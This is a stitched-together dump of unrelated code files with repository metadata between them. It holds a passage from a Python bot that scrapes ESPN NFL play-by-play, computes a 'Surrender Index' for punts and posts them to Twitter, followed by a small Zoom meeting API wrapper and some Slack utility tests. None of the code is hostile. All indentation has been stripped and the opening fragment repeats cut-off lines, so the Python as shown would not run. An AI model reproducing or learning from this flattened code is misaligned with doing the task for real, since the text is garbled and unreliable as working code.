if punt_distance > 50:
return play['yard_line'].split(" ")[0]
else:
return return_other_team(game,
play['yard_line'].split(" ")[0])
punt_distance = int(split[2]) + int(split[6])
if punt_distance > 50:
return play['yard_line'].split(" ")[0]
else:
return return_other_team(game, play['yard_line'].split(" ")[0])
return ''
except BaseException:
return ''
def get_possessing_team_from_drive(drive):
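    # Fall back to the team logo in the drive's accordion header; the team abbreviation
    # is embedded in the logo image filename.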
accordion_header = drive.find_element_by_xpath('../../..')
team_logo = accordion_header.find_element_by_class_name('team-logo')
if team_logo.get_attribute("src") is None:
team_logo = team_logo.find_element_by_tag_name('img')
img_name = team_logo.get_attribute("src")
index = img_name.find(".png")
return img_name[index - 3:index].lstrip("/").upper()
def get_possessing_team(play, drive, game):
possessing_team = get_possessing_team_from_play_roster(play, game)
if possessing_team != '':
return possessing_team
possessing_team = get_possessing_team_from_punt_distance(play, game)
return possessing_team if possessing_team != '' else get_possessing_team_from_drive(
drive)
### TEAM ABBREVIATION FUNCTIONS ###
def get_abbreviations(game):
return get_inner_html_of_elements(
game.find_elements_by_class_name("abbrev"))
def get_home_team(game):
return get_abbreviations(game)[1]
def get_away_team(game):
return get_abbreviations(game)[0]
def return_other_team(game, team):
return get_away_team(game) if get_home_team(
game) == team else get_home_team(game)
### GAME INFO FUNCTIONS ###
def get_game_id(game):
return game.current_url[-14:-5]
def get_game_header(game):
header_eles = game.find_elements_by_css_selector('div.game-details.header')
return get_inner_html_of_element(
header_eles[0]) if len(header_eles) > 0 else ""
def is_final(game):
element = game.find_element_by_class_name("status-detail")
is_final = 'final' in get_inner_html_of_element(element).lower()
if debug:
time_print(("is final", is_final))
return is_final
def is_postseason(game):
header = get_game_header(game).lower()
is_postseason = 'playoff' in header or 'championship' in header or 'super bowl' in header
if debug:
time_print(("is postseason", is_postseason))
return is_postseason
### SCORE FUNCTIONS ###
def get_scores(game):
parent_elements = game.find_elements_by_class_name("score-container")
elements = list(
map(lambda x: x.find_element_by_tag_name("div"), parent_elements))
return get_inner_html_of_elements(elements)
def get_home_score(play, drive, drives, game):
drive_index = drives.index(drive)
return get_drive_scores(drives, drive_index, game)[1]
def get_away_score(play, drive, drives, game):
drive_index = drives.index(drive)
return get_drive_scores(drives, drive_index, game)[0]
def get_drive_scores(drives, index, game):
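    # Read the score from the chronologically previous drive so it reflects the game state
    # when the punt occurred (drive order is reversed while the game is live).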
if is_final(game):
if index == 0:
drive = drives[0]
else:
drive = drives[index - 1]
else:
if index == len(drives) - 1:
drive = drives[-1]
else:
drive = drives[index + 1]
accordion_header = drive.find_element_by_xpath('../../..')
away_parent = accordion_header.find_element_by_class_name(
'home') # this is intentional, ESPN is dumb
home_parent = accordion_header.find_element_by_class_name(
'away') # this is intentional, ESPN is dumb
away_score_element = away_parent.find_element_by_class_name('team-score')
home_score_element = home_parent.find_element_by_class_name('team-score')
away_score, home_score = int(
get_inner_html_of_element(away_score_element)), int(
get_inner_html_of_element(home_score_element))
if debug:
time_print(("away score", away_score))
time_print(("home score", home_score))
return away_score, home_score
### PLAY FUNCTIONS ###
def is_punt(play):
text = play['text'].lower()
if 'fake punt' in text:
return False
if 'punts' in text:
return True
if 'punt is blocked' in text:
return True
if 'punt for ' in text:
return True
return False
def is_penalty(play):
return 'penalty' in play['text'].lower()
def get_yrdln_int(play):
return int(play['yard_line'].split(" ")[-1])
def get_field_side(play):
if '50' in play['yard_line']:
return None
else:
return play['yard_line'].split(" ")[0]
def get_time_str(play):
return play['time']
def get_qtr_num(play):
qtr = play['qtr']
if qtr == 'OT':
return 5
elif qtr == '2OT':
return 6
elif qtr == '3OT':
return 7
else:
return int(qtr[0])
def is_in_opposing_territory(play, drive, game):
is_in_opposing_territory = get_field_side(play) != get_possessing_team(
play, drive, game)
if debug:
time_print(("is in opposing territory", is_in_opposing_territory))
return is_in_opposing_territory
def get_dist_num(play):
return int(play['dist'])
### CALCULATION HELPER FUNCTIONS ###
def calc_seconds_from_time_str(time_str):
minutes, seconds = map(int, time_str.split(":"))
return minutes * 60 + seconds
def calc_seconds_since_halftime(play, game):
# Regular season games have only one overtime of length 10 minutes
if not is_postseason(game) and get_qtr_num(play) == 5:
seconds_elapsed_in_qtr = (10 * 60) - calc_seconds_from_time_str(
get_time_str(play))
else:
seconds_elapsed_in_qtr = (15 * 60) - calc_seconds_from_time_str(
get_time_str(play))
seconds_since_halftime = max(
seconds_elapsed_in_qtr + (15 * 60) * (get_qtr_num(play) - 3), 0)
if debug:
time_print(("seconds since halftime", seconds_since_halftime))
return seconds_since_halftime
def calc_score_diff(play, drive, drives, game):
drive_index = drives.index(drive)
away, home = get_drive_scores(drives, drive_index, game)
if get_possessing_team(play, drive, game) == get_home_team(game):
score_diff = int(home) - int(away)
else:
score_diff = int(away) - int(home)
if debug:
time_print(("score diff", score_diff))
return score_diff
### SURRENDER INDEX FUNCTIONS ###
def calc_field_pos_score(play, drive, game):
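    # Field position factor: grows exponentially as the punting team approaches and crosses midfield.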
try:
if get_yrdln_int(play) == 50:
return (1.1)**10.
if not is_in_opposing_territory(play, drive, game):
return max(1., (1.1)**(get_yrdln_int(play) - 40))
else:
return (1.2)**(50 - get_yrdln_int(play)) * ((1.1)**(10))
except BaseException:
return 0.
def calc_yds_to_go_multiplier(play):
dist = get_dist_num(play)
if dist >= 10:
return 0.2
elif dist >= 7:
return 0.4
elif dist >= 4:
return 0.6
elif dist >= 2:
return 0.8
else:
return 1.
def calc_score_multiplier(play, drive, drives, game):
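    # 1x when leading, 2x when tied, 3x when trailing by more than one score,
    # and 4x when trailing by eight points or fewer.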
score_diff = calc_score_diff(play, drive, drives, game)
if score_diff > 0:
return 1.
elif score_diff == 0:
return 2.
elif score_diff < -8.:
return 3.
else:
return 4.
def calc_clock_multiplier(play, drive, drives, game):
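    # When tied or trailing after halftime, the multiplier grows cubically with time elapsed since halftime.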
if calc_score_diff(play, drive, drives,
game) <= 0 and get_qtr_num(play) > 2:
seconds_since_halftime = calc_seconds_since_halftime(play, game)
return ((seconds_since_halftime * 0.001)**3.) + 1.
else:
return 1.
def calc_surrender_index(play, drive, drives, game):
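    # The Surrender Index is the product of the field position score and the
    # yards-to-go, score, and clock multipliers.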
field_pos_score = calc_field_pos_score(play, drive, game)
yds_to_go_mult = calc_yds_to_go_multiplier(play)
score_mult = calc_score_multiplier(play, drive, drives, game)
clock_mult = calc_clock_multiplier(play, drive, drives, game)
if debug:
time_print(play)
time_print("")
time_print(("field pos score", field_pos_score))
time_print(("yds to go mult", yds_to_go_mult))
time_print(("score mult", score_mult))
time_print(("clock mult", clock_mult))
return field_pos_score * yds_to_go_mult * score_mult * clock_mult
### PUNTER FUNCTIONS ###
def find_punters_for_team(team, roster):
base_link = 'https://www.espn.com/nfl/team/roster/_/name/'
roster_link = base_link + team
roster.get(roster_link)
header = roster.find_element_by_css_selector("div.Special.Teams")
parents = header.find_elements_by_css_selector(
"td.Table__TD:not(.Table__TD--headshot)")
punters = set()
for parent in parents:
try:
ele = parent.find_element_by_class_name("AnchorLink")
full_name = ele.get_attribute("innerHTML")
split = full_name.split(" ")
first_initial_last = full_name[0] + '.' + split[-1]
punters.add(first_initial_last)
except BaseException:
pass
return punters
def download_punters():
global punters
punters = {}
if os.path.exists('punters.json'):
file_mod_time = os.path.getmtime('punters.json')
else:
file_mod_time = 0.
if time.time() - file_mod_time < 60 * 60 * 12:
# if file modified within past 12 hours
with open('punters.json', 'r') as f:
punters_list = json.load(f)
for key, value in punters_list.items():
punters[key] = set(value)
else:
team_abbreviations = [
'ARI',
'ATL',
'BAL',
'BUF',
'CAR',
'CHI',
'CIN',
'CLE',
'DAL',
'DEN',
'DET',
'GB',
'HOU',
'IND',
'JAX',
'KC',
'LAC',
'LAR',
'LV',
'MIA',
'MIN',
'NE',
'NO',
'NYG',
'NYJ',
'PHI',
'PIT',
'SEA',
'SF',
'TB',
'TEN',
'WSH',
]
roster = get_game_driver()
for team in team_abbreviations:
time_print("Downloading punters for " + team)
punters[team] = find_punters_for_team(team, roster)
roster.quit()
punters_list = {}
for key, value in punters.items():
punters_list[key] = list(value)
with open('punters.json', 'w') as f:
json.dump(punters_list, f)
### STRING FORMAT FUNCTIONS ###
def get_pretty_time_str(time_str):
return time_str[1:] if time_str[0] == '0' and time_str[1] != ':' else time_str
def get_qtr_str(qtr):
return qtr if 'OT' in qtr else 'the ' + get_num_str(int(qtr[0]))
def get_ordinal_suffix(num):
last_digit = str(num)[-1]
if last_digit == '1':
return 'st'
elif last_digit == '2':
return 'nd'
elif last_digit == '3':
return 'rd'
else:
return 'th'
def get_num_str(num):
rounded_num = int(num) # round down
if rounded_num % 100 == 11 or rounded_num % 100 == 12 or rounded_num % 100 == 13:
return str(rounded_num) + 'th'
# add more precision for 99th percentile
if rounded_num == 99:
if num < 99.9:
return str(round(num, 1)) + get_ordinal_suffix(round(num, 1))
elif num < 99.99:
return str(round(num, 2)) + get_ordinal_suffix(round(num, 2))
else:
# round down
multiplied = int(num * 1000)
rounded_down = float(multiplied) / 1000
return str(rounded_down) + get_ordinal_suffix(rounded_down)
return str(rounded_num) + get_ordinal_suffix(rounded_num)
def pretty_score_str(score_1, score_2):
if score_1 > score_2:
ret_str = 'winning '
elif score_2 > score_1:
ret_str = 'losing '
else:
ret_str = 'tied '
ret_str += str(score_1) + ' to ' + str(score_2)
return ret_str
def get_score_str(play, drive, drives, game):
if get_possessing_team(play, drive, game) == get_home_team(game):
return pretty_score_str(get_home_score(play, drive, drives, game),
get_away_score(play, drive, drives, game))
else:
return pretty_score_str(get_away_score(play, drive, drives, game),
get_home_score(play, drive, drives, game))
### DELAY OF GAME FUNCTIONS ###
def is_delay_of_game(play, prev_play):
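    # Treat a punt as preceded by a (likely intentional) delay of game when the prior play
    # drew that penalty and the distance to go increased.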
return 'delay of game' in prev_play['text'].lower(
) and get_dist_num(play) - get_dist_num(prev_play) > 0
### HISTORY FUNCTIONS ###
def has_been_tweeted(play, drive, game, game_id):
global tweeted_plays
game_plays = tweeted_plays.get(game_id, [])
for old_play in list(game_plays):
old_possessing_team, old_qtr, old_time = old_play.split('_')
new_possessing_team, new_qtr, new_time = play_hash(play, drive,
game).split('_')
if old_possessing_team == new_possessing_team and old_qtr == new_qtr and abs(
calc_seconds_from_time_str(old_time) -
calc_seconds_from_time_str(new_time)) < 50:
# Check if the team with possession and quarter are the same, and
# if the game clock at the start of the play is within 50 seconds.
return True
return False
def has_been_seen(play, drive, game, game_id):
global seen_plays
game_plays = seen_plays.get(game_id, [])
for old_play in list(game_plays):
if old_play == deep_play_hash(play, drive, game):
return True
game_plays.append(deep_play_hash(play, drive, game))
seen_plays[game_id] = game_plays
return False
def penalty_has_been_seen(play, drive, game, game_id):
global penalty_seen_plays
game_plays = penalty_seen_plays.get(game_id, [])
for old_play in list(game_plays):
if old_play == deep_play_hash(play, drive, game):
return True
game_plays.append(deep_play_hash(play, drive, game))
penalty_seen_plays[game_id] = game_plays
return False
def has_been_final(game_id):
global final_games
if game_id in final_games:
return True
final_games.add(game_id)
return False
def play_hash(play, drive, game):
possessing_team = get_possessing_team(play, drive, game)
qtr = play['qtr']
time = play['time']
return possessing_team + '_' + qtr + '_' + time
def deep_play_hash(play, drive, game):
possessing_team = get_possessing_team(play, drive, game)
qtr = play['qtr']
time = play['time']
down = play['down']
dist = play['dist']
yard_line = play['yard_line']
return possessing_team + '_' + qtr + '_' + time + \
'_' + down + '_' + dist + '_' + yard_line
def load_tweeted_plays_dict():
global tweeted_plays
tweeted_plays = {}
if os.path.exists('tweeted_plays.json'):
file_mod_time = os.path.getmtime('tweeted_plays.json')
else:
file_mod_time = 0.
if time.time() - file_mod_time < 60 * 60 * 12:
# if file modified within past 12 hours
with open('tweeted_plays.json', 'r') as f:
tweeted_plays = json.load(f)
else:
with open('tweeted_plays.json', 'w') as f:
json.dump(tweeted_plays, f)
def update_tweeted_plays(play, drive, game, game_id):
global tweeted_plays
game_plays = tweeted_plays.get(game_id, [])
game_plays.append(play_hash(play, drive, game))
tweeted_plays[game_id] = game_plays
with open('tweeted_plays.json', 'w') as f:
json.dump(tweeted_plays, f)
### PERCENTILE FUNCTIONS ###
def load_historical_surrender_indices():
with open('1999-2020_surrender_indices.npy', 'rb') as f:
return np.load(f)
def load_current_surrender_indices():
try:
with open('current_surrender_indices.npy', 'rb') as f:
return np.load(f)
except BaseException:
return np.array([])
def write_current_surrender_indices(surrender_indices):
with open('current_surrender_indices.npy', 'wb') as f:
np.save(f, surrender_indices)
def calculate_percentiles(surrender_index, should_update_file=True):
global historical_surrender_indices
current_surrender_indices = load_current_surrender_indices()
current_percentile = stats.percentileofscore(current_surrender_indices,
surrender_index,
kind='strict')
all_surrender_indices = np.concatenate(
(historical_surrender_indices, current_surrender_indices))
historical_percentile = stats.percentileofscore(all_surrender_indices,
surrender_index,
kind='strict')
if should_update_file:
current_surrender_indices = np.append(current_surrender_indices,
surrender_index)
write_current_surrender_indices(current_surrender_indices)
return current_percentile, historical_percentile
### TWITTER FUNCTIONS ###
def initialize_api():
with open('credentials.json', 'r') as f:
credentials = json.load(f)
auth = tweepy.OAuthHandler(credentials['consumer_key'],
credentials['consumer_secret'])
auth.set_access_token(credentials['access_token'],
credentials['access_token_secret'])
api = tweepy.API(auth)
auth = tweepy.OAuthHandler(credentials['90_consumer_key'],
credentials['90_consumer_secret'])
auth.set_access_token(credentials['90_access_token'],
credentials['90_access_token_secret'])
ninety_api = tweepy.API(auth)
auth = tweepy.OAuthHandler(credentials['cancel_consumer_key'],
credentials['cancel_consumer_secret'])
auth.set_access_token(credentials['cancel_access_token'],
credentials['cancel_access_token_secret'])
cancel_api = tweepy.API(auth)
return api, ninety_api, cancel_api
def initialize_gmail_client():
with open('credentials.json', 'r') as f:
credentials = json.load(f)
SCOPES = ['https://www.googleapis.com/auth/gmail.compose']
email = credentials['gmail_email']
creds = None
if os.path.exists("gmail_token.pickle"):
with open("gmail_token.pickle", "rb") as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'gmail_credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
with open("gmail_token.pickle", "wb") as token:
pickle.dump(creds, token)
return build('gmail', 'v1', credentials=creds)
def initialize_twilio_client():
with open('credentials.json', 'r') as f:
credentials = json.load(f)
return Client(credentials['twilio_account_sid'],
credentials['twilio_auth_token'])
def send_message(body):
global gmail_client
global twilio_client
global notify_using_twilio
with open('credentials.json', 'r') as f:
credentials = json.load(f)
if notify_using_twilio:
message = twilio_client.messages.create(
body=body,
from_=credentials['from_phone_number'],
to=credentials['to_phone_number'])
elif notify_using_native_mail:
script = """tell application "Mail"
set newMessage to make new outgoing message with properties {{visible:false, subject:"{}", sender:"{}", content:"{}"}}
tell newMessage
make new to recipient with properties {{address:"{}"}}
end tell
send newMessage
end tell
tell application "System Events"
set visible of application process "Mail" to false
end tell
"""
formatted_script = script.format(
body, credentials['gmail_email'], body, credentials['gmail_email'])
p = Popen('/usr/bin/osascript', stdin=PIPE,
stdout=PIPE, encoding='utf8')
p.communicate(formatted_script)
else:
message = MIMEText(body)
message['to'] = credentials['gmail_email']
message['from'] = credentials['gmail_email']
message['subject'] = body
message_obj = {'raw': urlsafe_b64encode(message.as_bytes()).decode()}
gmail_client.users().messages().send(userId="me", body=message_obj).execute()
def send_heartbeat_message(should_repeat=True):
global should_text
while True:
if should_text:
send_message("The Surrender Index script is up and running.")
if not should_repeat:
break
time.sleep(60 * 60 * 24)
def send_error_message(e, body="An error occurred"):
global should_text
if should_text:
send_message(body + ": " + str(e) + ".")
def create_delay_of_game_str(play, drive, game, prev_play,
unadjusted_surrender_index,
unadjusted_current_percentile,
unadjusted_historical_percentile):
if get_yrdln_int(play) == 50:
new_territory_str = '50'
else:
new_territory_str = play['yard_line']
if get_yrdln_int(prev_play) == 50:
old_territory_str = '50'
else:
old_territory_str = prev_play['yard_line']
penalty_str = "*" + get_possessing_team(
play, drive,
game) + " committed a (likely intentional) delay of game penalty, "
old_yrdln_str = "moving the play from " + prev_play[
'down'] + ' & ' + prev_play['dist'] + " at the " + prev_play[
'yard_line']
new_yrdln_str = " to " + play['down'] + ' & ' + play[
'dist'] + " at the " + play['yard_line'] + ".\n\n"
index_str = "If this penalty was in fact unintentional, the Surrender Index would be " + str(
round(unadjusted_surrender_index, 2)) + ", "
percentile_str = "ranking at the " + get_num_str(
unadjusted_current_percentile) + " percentile of the 2021 season."
return penalty_str + old_yrdln_str + new_yrdln_str + index_str + percentile_str
def create_tweet_str(play,
drive,
drives,
game,
surrender_index,
current_percentile,
historical_percentile,
delay_of_game=False):
territory_str = '50' if get_yrdln_int(play) == 50 else play['yard_line']
asterisk = '*' if delay_of_game else ''
decided_str = get_possessing_team(
play, drive, game) + ' decided to punt to ' + return_other_team(
game, get_possessing_team(play, drive, game))
yrdln_str = ' from the ' + territory_str + asterisk + ' on '
down_str = play['down'] + ' & ' + play['dist'] + asterisk
clock_str = ' with ' + get_pretty_time_str(play['time']) + ' remaining in '
qtr_str = get_qtr_str(play['qtr']) + ' while ' + get_score_str(
play, drive, drives, game) + '.'
play_str = decided_str + yrdln_str + down_str + clock_str + qtr_str
surrender_str = 'With a Surrender Index of ' + str(
round(surrender_index, 2)
) + ', this punt ranks at the ' + get_num_str(
current_percentile
) + ' percentile of cowardly punts of the 2021 season, and the ' + get_num_str(
historical_percentile) + ' percentile of all punts since 1999.'
return play_str + '\n\n' + surrender_str
def tweet_play(play, prev_play, drive, drives, game, game_id):
global api
global ninety_api
global cancel_api
global should_tweet
delay_of_game = is_delay_of_game(play, prev_play)
if delay_of_game:
updated_play = play.copy()
updated_play['dist'] = prev_play['dist']
updated_play['yard_line'] = prev_play['yard_line']
surrender_index = calc_surrender_index(updated_play, drive, drives,
game)
current_percentile, historical_percentile = calculate_percentiles(
surrender_index)
unadjusted_surrender_index = calc_surrender_index(
play, drive, drives, game)
unadjusted_current_percentile, unadjusted_historical_percentile = calculate_percentiles(
unadjusted_surrender_index, should_update_file=False)
tweet_str = create_tweet_str(updated_play, drive, drives, game,
surrender_index, current_percentile,
historical_percentile, delay_of_game)
else:
surrender_index = calc_surrender_index(play, drive, drives, game)
current_percentile, historical_percentile = calculate_percentiles(
surrender_index)
tweet_str = create_tweet_str(play, drive, drives, game,
surrender_index, current_percentile,
historical_percentile, delay_of_game)
time_print(tweet_str)
if delay_of_game:
delay_of_game_str = create_delay_of_game_str(
play, drive, game, prev_play, unadjusted_surrender_index,
unadjusted_current_percentile, unadjusted_historical_percentile)
time_print(delay_of_game_str)
if should_tweet:
status = api.update_status(tweet_str)
if delay_of_game:
api.update_status(delay_of_game_str,
in_reply_to_status_id=status.id_str)
# Post the status to the 90th percentile account.
if current_percentile >= 90. and should_tweet:
ninety_status = ninety_api.update_status(tweet_str)
if delay_of_game:
ninety_api.update_status(
delay_of_game_str, in_reply_to_status_id=ninety_status.id_str)
thread = threading.Thread(target=handle_cancel,
args=(ninety_status._json, tweet_str))
thread.start()
update_tweeted_plays(play, drive, game, game_id)
### CANCEL FUNCTIONS ###
def post_reply_poll(link):
driver = get_twitter_driver(link)
driver.find_element_by_xpath("//div[@aria-label='Reply']").click()
driver.find_element_by_xpath("//div[@aria-label='Add poll']").click()
driver.find_element_by_name("Choice1").send_keys("Yes")
driver.find_element_by_name("Choice2").send_keys("No")
Select(driver.find_element_by_xpath(
"//select[@aria-label='Days']")).select_by_visible_text("0")
Select(driver.find_element_by_xpath(
"//select[@aria-label='Hours']")).select_by_visible_text("1")
Select(driver.find_element_by_xpath(
"//select[@aria-label='Minutes']")).select_by_visible_text("0")
driver.find_element_by_xpath("//div[@aria-label='Tweet text']").send_keys(
"Should this punt's Surrender Index be canceled?")
driver.find_element_by_xpath("//div[@data-testid='tweetButton']").click()
time.sleep(10)
driver.close()
def check_reply(link):
time.sleep(61 * 60) # Wait one hour and one minute to check reply
driver = get_game_driver(headless=False)
driver.get(link)
time.sleep(3)
poll_title = driver.find_element_by_xpath("//*[contains(text(), 'votes')]")
poll_content = poll_title.find_element_by_xpath("./../../../..")
poll_result = poll_content.find_elements_by_tag_name("span")
poll_values = [poll_result[2], poll_result[5]]
poll_floats = list(
map(lambda x: float(x.get_attribute("innerHTML").strip('%')),
poll_values))
driver.close()
time_print(("checking poll results: ", poll_floats))
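    # Cancel the punt only if at least two-thirds of poll voters said "Yes".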
return poll_floats[0] >= 66.67 if len(poll_floats) == 2 else None
def cancel_punt(orig_status, full_text):
global ninety_api
global cancel_api
ninety_api.destroy_status(orig_status['id'])
cancel_status = cancel_api.update_status(full_text)._json
new_cancel_text = 'CANCELED https://twitter.com/CancelSurrender/status/' + cancel_status[
'id_str']
time.sleep(10)
ninety_api.update_status(new_cancel_text)
def handle_cancel(orig_status, full_text):
try:
orig_link = 'https://twitter.com/surrender_idx90/status/' + orig_status[
'id_str']
post_reply_poll(orig_link)
if check_reply(orig_link):
cancel_punt(orig_status, full_text)
except Exception as e:
traceback.print_exc()
time_print("An error occurred when trying to handle canceling a tweet")
time_print(orig_status)
time_print(e)
send_error_message(
e, "An error occurred when trying to handle canceling a tweet")
### CURRENT GAME FUNCTIONS ###
def time_print(message):
print(get_current_time_str() + ": " + str(message))
def get_current_time_str():
return datetime.now().strftime("%b %-d at %-I:%M:%S %p")
def get_now():
return datetime.now(tz=tz.gettz())
def update_current_year_games():
global current_year_games
two_months_ago = get_now() - timedelta(days=60)
scoreboard_urls = espn.get_all_scoreboard_urls("nfl", two_months_ago.year)
current_year_games = []
for scoreboard_url in scoreboard_urls:
data = None
backoff_time = 1.
while data is None:
try:
data = espn.get_url(scoreboard_url)
except BaseException:
time.sleep(backoff_time)
backoff_time *= 2.
for event in data['content']['sbData']['events']:
current_year_games.append(event)
def get_active_game_ids():
global current_year_games
global completed_game_ids
now = get_now()
active_game_ids = set()
for game in current_year_games:
if game['id'] in completed_game_ids:
# ignore any games that are marked completed (which is done by
# checking if ESPN says final)
continue
game_time = parser.parse(
game['date']).replace(tzinfo=timezone.utc).astimezone(tz=None)
if game_time - timedelta(minutes=15) < now and game_time + timedelta(
hours=6) > now:
# game should start within 15 minutes and not started more than 6
# hours ago
active_game_ids.add(game['id'])
return active_game_ids
def clean_games(active_game_ids):
global games
global clean_immediately
global disable_final_check
global completed_game_ids
for game_id in list(games.keys()):
if game_id not in active_game_ids:
games[game_id].quit()
            del games[game_id]
            continue  # driver already closed and removed; skip the final check below
        if not disable_final_check:
if is_final(games[game_id]):
if has_been_final(game_id) or clean_immediately:
completed_game_ids.add(game_id)
games[game_id].quit()
del games[game_id]
def download_data_for_active_games():
global games
active_game_ids = get_active_game_ids()
if len(active_game_ids) == 0:
time_print("No games active. Sleeping for 15 minutes...")
time.sleep(14 * 60) # We sleep for another minute in the live callback
game_added = False
for game_id in active_game_ids:
if game_id not in games:
game = get_game_driver()
base_link = 'https://www.espn.com/nfl/playbyplay?gameId='
game_link = base_link + game_id
game.get(game_link)
games[game_id] = game
game_added = True
if game_added:
time_print("Sleeping 10 seconds for game to load")
time.sleep(10)
clean_games(active_game_ids)
live_callback()
### MAIN FUNCTIONS ###
def live_callback():
global games
start_time = time.time()
for game_id, game in games.items():
try:
time_print('Getting data for game ID ' + game_id)
drives = get_all_drives(game)
for index, drive in enumerate(drives):
num_printed = 0
drive_plays = get_plays_from_drive(drive, game)
for play_index, play in enumerate(drive_plays):
if debug and index == 0 and num_printed < 3:
time_print(play['text'])
num_printed += 1
if not is_punt(play):
continue
if is_penalty(play):
if is_final(game):
if play_index != len(drive_plays) - 1:
continue
else:
if play_index != 0:
continue
if not penalty_has_been_seen(play, drive, game,
game_id):
continue
if has_been_tweeted(play, drive, game, game_id):
continue
if not has_been_seen(play, drive, game, game_id):
continue
if is_final(game):
prev_play = drive_plays[play_index -
1] if play_index > 0 else play
else:
prev_play = drive_plays[play_index +
1] if play_index + 1 < len(drive_plays) else play
tweet_play(play, prev_play, drive, drives, game, game_id)
time_print("Done getting data for game ID " + game_id)
except StaleElementReferenceException:
time_print("stale element, sleeping for 1 second.")
time.sleep(1)
return
while (time.time() < start_time + 60):
time.sleep(1)
def main():
global api
global ninety_api
global cancel_api
global historical_surrender_indices
global should_text
global should_tweet
global notify_using_native_mail
global notify_using_twilio
global final_games
global debug
global not_headless
global clean_immediately
global disable_final_check
global sleep_time
global seen_plays
global penalty_seen_plays
global gmail_client
global twilio_client
global completed_game_ids
parser = argparse.ArgumentParser(
description="Run the Surrender Index bot.")
parser.add_argument('--disableTweeting',
action='store_true',
dest='disableTweeting')
parser.add_argument('--disableNotifications',
action='store_true',
dest='disableNotifications')
parser.add_argument('--notifyUsingTwilio',
action='store_true',
dest='notifyUsingTwilio')
parser.add_argument('--debug', action='store_true', dest='debug')
parser.add_argument('--notHeadless', action='store_true', dest='notHeadless')
parser.add_argument('--disableFinalCheck',
action='store_true',
dest='disableFinalCheck')
args = parser.parse_args()
should_tweet = not args.disableTweeting
should_text = not args.disableNotifications
notify_using_twilio = args.notifyUsingTwilio
notify_using_native_mail = sys.platform == "darwin" and not notify_using_twilio
debug = args.debug
not_headless = args.notHeadless
disable_final_check = args.disableFinalCheck
print("Tweeting Enabled" if should_tweet else "Tweeting Disabled")
api, ninety_api, cancel_api = initialize_api()
historical_surrender_indices = load_historical_surrender_indices()
sleep_time = 1
clean_immediately = True
completed_game_ids = set()
final_games = set()
should_continue = True
while should_continue:
try:
chromedriver_autoinstaller.install()
# update current year games and punters at 5 AM every day
if notify_using_twilio:
twilio_client = initialize_twilio_client()
elif not notify_using_native_mail:
gmail_client = initialize_gmail_client()
send_heartbeat_message(should_repeat=False)
update_current_year_games()
download_punters()
load_tweeted_plays_dict()
seen_plays, penalty_seen_plays = {}, {}
now = get_now()
if now.hour < 5:
stop_date = now.replace(hour=5,
minute=0,
second=0,
microsecond=0)
else:
now += timedelta(days=1)
stop_date = now.replace(hour=5,
minute=0,
second=0,
microsecond=0)
while get_now() < stop_date:
start_time = time.time()
download_data_for_active_games()
clean_immediately = False
sleep_time = 1.
except KeyboardInterrupt:
should_continue = False
except Exception as e:
# When an exception occurs: log it, send a message, and sleep for an
# exponential backoff time
traceback.print_exc()
time_print("Error occurred:")
time_print(e)
time_print("Sleeping for " + str(sleep_time) + " minutes")
send_error_message(e)
time.sleep(sleep_time * 60)
sleep_time *= 2
if __name__ == "__main__":
main()
``` |
{
"source": "JoeyAlpha5/django-zoom-meetings",
"score": 3
} |
#### File: lib/django_zoom_meetings/__init__.py
```python
import jwt
import datetime
import requests
import json
class ZoomMeetings:
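    # Minimal wrapper around the Zoom REST API v2 using short-lived JWT authentication.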
def __init__(self,api_key,secret_key,user_email):
self.time_now = datetime.datetime.now()
self.expiration_time = self.time_now+datetime.timedelta(minutes=20)
self.expiration_in_seconds = round(self.expiration_time.timestamp())
# token requirements
self.headers = {"alg": "HS256","typ": "JWT"}
self.payload = {"iss": api_key,"exp": self.expiration_in_seconds}
# generate token
self.request_token = jwt.encode(self.payload,secret_key,algorithm="HS256",headers=self.headers)
self.email = user_email
def CreateMeeting(self,date,topic,meeting_duration,meeting_password):
required_date_format = date.strftime("%Y-%m-%dT%H:%M:%SZ")
url = 'https://api.zoom.us/v2/users/'+self.email+'/meetings'
        jsonObj = {"topic": topic, "start_time":required_date_format,"duration":meeting_duration,"password":meeting_password}
header = {'authorization': 'Bearer '+self.request_token}
zoom_create_meeting = requests.post(url,json=jsonObj, headers=header)
return json.loads(zoom_create_meeting.text)
def DeletMeeting(self,meeting_id):
url = 'https://api.zoom.us/v2/meetings/'+str(meeting_id)
header = {'authorization': 'Bearer '+self.request_token}
zoom_delete_meeting = requests.delete(url, headers=header)
return zoom_delete_meeting
def GetMeeting(self,meeting_id):
url = 'https://api.zoom.us/v2/meetings/'+str(meeting_id)
header = {'authorization': 'Bearer '+self.request_token}
get_zoom_meeting = requests.get(url, headers=header)
return json.loads(get_zoom_meeting.text)
``` |
{
"source": "joe-yama/slack-most-reacted",
"score": 2
} |
#### File: slack-most-reacted/tests/test_main.py
```python
from slack_sdk import WebClient
from typing import Optional
import os
from pprint import pprint
# from slackmostreacted import mostreacted
# from slackmostreacted import Post
from slackmostreacted.slack_utils import most_reacted_messages, post_most_reaction_award, search_channel
from slackmostreacted.slack_utils import list_messages
from slackmostreacted.slack_utils import Channel
def test_connect_bot() -> None:
# channel: Channel = search_channel("tmc-zatsudan")
# print(list_messages(channel.id))
# pprint(most_reacted_messages(channel_name="tmc-zatsudan", k=5))
messages = most_reacted_messages("test_award")
post_most_reaction_award("test_award", awarded_message=messages[0])
def test_search_name(slack_webclient_mock: WebClient) -> None:
assert search_channel("test-channel-1", client=slack_webclient_mock).id == "C1"
def test_most_reacted_post() -> None:
# channel = "mychannel"
# post: Post = mostreacted(channel)
pass
``` |
{
"source": "joe-yama/slck-cli",
"score": 3
} |
#### File: slck-cli/tests/test_message.py
```python
from typing import List
from mock_slack_client import MockSlackClient
from slck.message import Message, MessageManager
class TestMessageManager:
def test__initialize(self) -> None:
client: MockSlackClient = MockSlackClient()
MessageManager(client)
def test__list_message_by_channel_id(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
messages: List[Message] = message_manager.list(channel="C111", name=False)
assert len(messages) == 4
def test__list_message_by_channel_name(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
messages: List[Message] = message_manager.list(channel="general", name=True)
assert len(messages) == 4
def test__popular_message(self) -> None:
client: MockSlackClient = MockSlackClient()
message_manager: MessageManager = MessageManager(client)
popular_post: Message = message_manager.popular(
channel="general", name=True, k=1, permalink=True
)[0]
assert popular_post.user.id == "W012A3CDE"
